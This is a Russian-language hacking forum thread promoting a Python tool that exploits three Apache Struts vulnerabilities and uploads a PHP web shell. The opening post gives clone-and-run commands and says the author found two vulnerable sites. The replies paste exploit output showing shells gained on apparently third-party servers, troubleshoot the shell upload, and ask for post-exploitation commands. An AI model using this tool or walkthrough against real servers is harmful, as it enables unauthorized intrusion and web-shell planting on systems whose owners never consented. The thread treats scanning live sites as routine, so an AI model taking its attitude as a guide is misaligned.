Soft Apache Struts v3 - Используем уязвимости.

Всем привет. Представляю вам новинку. Она проверяет 3 уязвимости.
Страница разработчика -== s1kr10s/Apache-Struts-v3
Разработчик -== s1kr10s

Введение.

4d944997.jpg


Apache Struts v3 - Скрипт , который содержит набор из 3 уязвимостей:
Код:
1)CVE-2013-2251 'action:', 'redirect:' and 'redirectAction'
2)CVE-2017-5638 Content-Type
3)CVE-2018-11776 'redirect:' and 'redirectAction'
Также может создать серверную оболочку.

Проверяем сайты:
Код:
# python ApacheStruts.py
## <Сайт>
# HOST: https://codeby.net

1)
Screenshot from 2018-08-26 22-52-55.png

2)
Screenshot from 2018-08-26 22-57-17.png

Screenshot from 2018-08-26 22-57-24.png

3)
Screenshot from 2018-08-26 23-03-07.png

Screenshot from 2018-08-26 23-03-14.png

Подведем итоги:
Мне удалось найти 2 уязвимых сайта , новинка меня порадовала.
Данный скрипт будет полезен новичкам.
Используйте Apache Struts v3 для своих сайтах. Не нарушайте закон!


Код:
Установка и запуск:
# git clone https://github.com/s1kr10s/Apache-Struts-v3.git
# cd Apache-Struts-v3
# Запуск -== python ApacheStruts.py
#  HOST:  <Сайт>

Спасибо за внимание.
 

Elektrolife

Green Team
21.10.2016
208
33
BIT
27
В примере написано Что такое files.login ? Просто произвольная страница взятая для примера ?

У меня почему то нет надписи " upload shell "

[+] EJECUTANDO EXPLOIT 1
[-] NO VULNERABLE
[+] EJECUTANDO EXPLOIT 2
[-] VULNERABLE
[-] RUN EXPLOIT (s/n): s
[-] GET PROMPT...


Struts2@Shell_2:$

Шелл вроде как получил но на любые команды он выдаёт конфигурацию апача ( насколько я понял ) Я что то упустил ?
 
Л

Литиум

В примере написано Что такое files.login ? Просто произвольная страница взятая для примера ?

У меня почему то нет надписи " upload shell "

[+] EJECUTANDO EXPLOIT 1
[-] NO VULNERABLE
[+] EJECUTANDO EXPLOIT 2
[-] VULNERABLE
[-] RUN EXPLOIT (s/n): s
[-] GET PROMPT...


Struts2@Shell_2:$

Шелл вроде как получил но на любые команды он выдаёт конфигурацию апача ( насколько я понял ) Я что то упустил ?
С данной проблемой не сталкивался , попробуйте на другом сайте. Если будет такая же проблема , постараюсь решить вашу проблему.
 

HakJob

Green Team
17.04.2018
248
167
BIT
0
Код:
 [+] EJECUTANDO EXPLOIT 1
   [-] VULNERABLE
   [-] RUN EXPLOIT (s/n): s
   [-] GET PROMPT...

   * [UPLOAD SHELL]
     Struts@Shell:$ pwnd (php)

Struts2@Shell_1:$ pwnd
path EJ:/tmp/: ls
Traceback (most recent call last):
  File "ApacheStruts.py", line 115, in <module>
    if espacio[1] == 'php':
IndexError: list index out of range
 

invetrika

Green Team
29.06.2018
49
18
BIT
47
Shell получается но вылазиет ошибка , открыл скрипт, посмотрел 115 строку на которую ругается, нихена не понял, решил написать сюда, как в целом эскплуатируется данная уязвимость, и что с ней можно сделать далее, после получения шеллов?
 
Л

Литиум

Shell получается но вылазиет ошибка , открыл скрипт, посмотрел 115 строку на которую ругается, нихена не понял, решил написать сюда, как в целом эскплуатируется данная уязвимость, и что с ней можно сделать далее, после получения шеллов?
(115).
pathsave=raw_input("path EJ:/tmp/: ")
if espacio[1] == 'php':

Вы правы. Остается только ждать когда разработчик скрипта исправит ошибку. Возможно есть альтернативное решение проблемы. Сейчас разбираюсь.
IndexError: list index out of range

Shell получается но вылазиет ошибка , открыл скрипт, посмотрел 115 строку на которую ругается, нихена не понял, решил написать сюда, как в целом эскплуатируется данная уязвимость, и что с ней можно сделать далее, после получения шеллов?
Внимание! Скрипт перезалили!
Screenshot from 2018-08-27 18-30-18.png
 
Последнее редактирование модератором:

HakJob

Green Team
17.04.2018
248
167
BIT
0
Перезалил себе скрипт - теперь на старте сразу ошибка )) Не обновляйтесь пока
 
  • Нравится
Реакции: Литиум

invetrika

Green Team
29.06.2018
49
18
BIT
47
Надо код поковырять)) посмотреть, а вдруг это кто то пытается Backdoor нам закинуть))) что бы следить за нами))
П - паранойя over100000000% )))
 
Л

Литиум

Надо код поковырять)) посмотреть, а вдруг это кто то пытается Backdoor нам закинуть))) что бы следить за нами))
П - паранойя over100000000% )))
Вообще-то opensource , просто посмотри код , в противном случае администрация github давно бы удалила скрипт. К тому же , это его не первый проект.
 
  • Нравится
Реакции: DefWolf

invetrika

Green Team
29.06.2018
49
18
BIT
47
Вообще-то opensource , просто посмотри код , в противном случае администрация github давно бы удалила скрипт. К тому же , это его не первый проект.
Да я задуряюсь) Просто прочитал где то про внедрение бэкдоров в python скрипты) и всё, у меня началась паранойя)
 
  • Нравится
Реакции: Литиум

HakJob

Green Team
17.04.2018
248
167
BIT
0
у кого старая версия файла осталась - выложите плиз
 

Dinzex

Green Team
15.04.2018
22
8
BIT
0
Эх, знать бы команды для пост эксплуатации. ТС, дай знать как исправят ошибку. А за софт D A Y B O G Z D O R O V Y A
 

Elektrolife

Green Team
21.10.2016
208
33
BIT
27
Примерно вот какая хрень у меня постоянно:


[+] EJECUTANDO EXPLOIT 2
[-] VULNERABLE
[-] RUN EXPLOIT (s/n): s
[-] GET PROMPT...


Struts2@Shell_2:$ ls
censed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
*
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
-->

<!DOCTYPE html>
 

HakJob

Green Team
17.04.2018
248
167
BIT
0
так он вроде не показывает там уязвимостей
проверь на другом обьекте
 

HakJob

Green Team
17.04.2018
248
167
BIT
0
Шел залит, но пути к нему не могу найти


Код:
[+] EJECUTANDO EXPLOIT CVE-2013-2251
   [-] VULNERABLE
   [-] RUN THIS EXPLOIT (s/n): s
   [-] GET PROMPT...

   * [UPLOAD SHELL]
     Struts@Shell:$ pwnd (php)

Struts2@Shell_1:$ pwnd php
path EJ:/tmp/: /tmp/

Create File Successfull :) [/tmp/status.php]
 

Dinzex

Green Team
15.04.2018
22
8
BIT
0
[+] EJECUTANDO EXPLOIT CVE-2013-2251
[-] VULNERABLE
[-] RUN THIS EXPLOIT (s/n): s
[-] GET PROMPT...

* [UPLOAD SHELL]
Struts@Shell:$ pwnd (php)

Struts2@Shell_1:$ pwnd php
path EJ:/tmp/: /tmp/

No Create File :/

Что не так, ребят?
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!